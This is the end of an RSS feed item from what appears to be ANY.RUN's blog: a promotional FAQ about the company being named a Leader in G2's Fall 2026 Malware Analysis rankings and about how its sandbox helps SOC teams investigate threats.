<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1789033042982"><strong class="schema-faq-question"><strong>1. Is ANY.RUN a G2 Leader in Malware Analysis?</strong></strong> <p class="schema-faq-answer">Yes. ANY.RUN was named a Momentum Leader and Grid Leader in G2’s Fall 2026 Malware Analysis rankings.</p> </div> <div class="schema-faq-section" id="faq-question-1789033059483"><strong class="schema-faq-question"><strong>2. What does G2 Momentum Leader mean?</strong><br></strong> <p class="schema-faq-answer">It recognizes products demonstrating strong momentum and growth within their category.</p> </div> <div class="schema-faq-section" id="faq-question-1789033069723"><strong class="schema-faq-question"><strong>3. What does G2 Grid Leader mean?</strong><br></strong> <p class="schema-faq-answer">Grid Leaders combine high customer satisfaction with a strong market presence.</p> </div> <div class="schema-faq-section" id="faq-question-1789033078132"><strong class="schema-faq-question"><strong>4. How does ANY.RUN help SOC teams?</strong><br></strong> <p class="schema-faq-answer">ANY.RUN helps teams investigate threats faster, reduce manual workload, and make more confident security decisions.</p> </div> <div class="schema-faq-section" id="faq-question-1789033095579"><strong class="schema-faq-question"><strong>5. What threats can SOC teams investigate with ANY.RUN?</strong><br></strong> <p class="schema-faq-answer">Teams can analyze malware, phishing, suspicious files, URLs, and related threat activity across Windows, Linux, macOS, and Android.</p> </div> </div>
<p>The post <a href="https://any.run/cybersecurity-blog/g2-leader-fall-2026/">ANY.RUN Secures Leader Status in G2’s Malware Analysis Rankings</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/g2-leader-fall-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>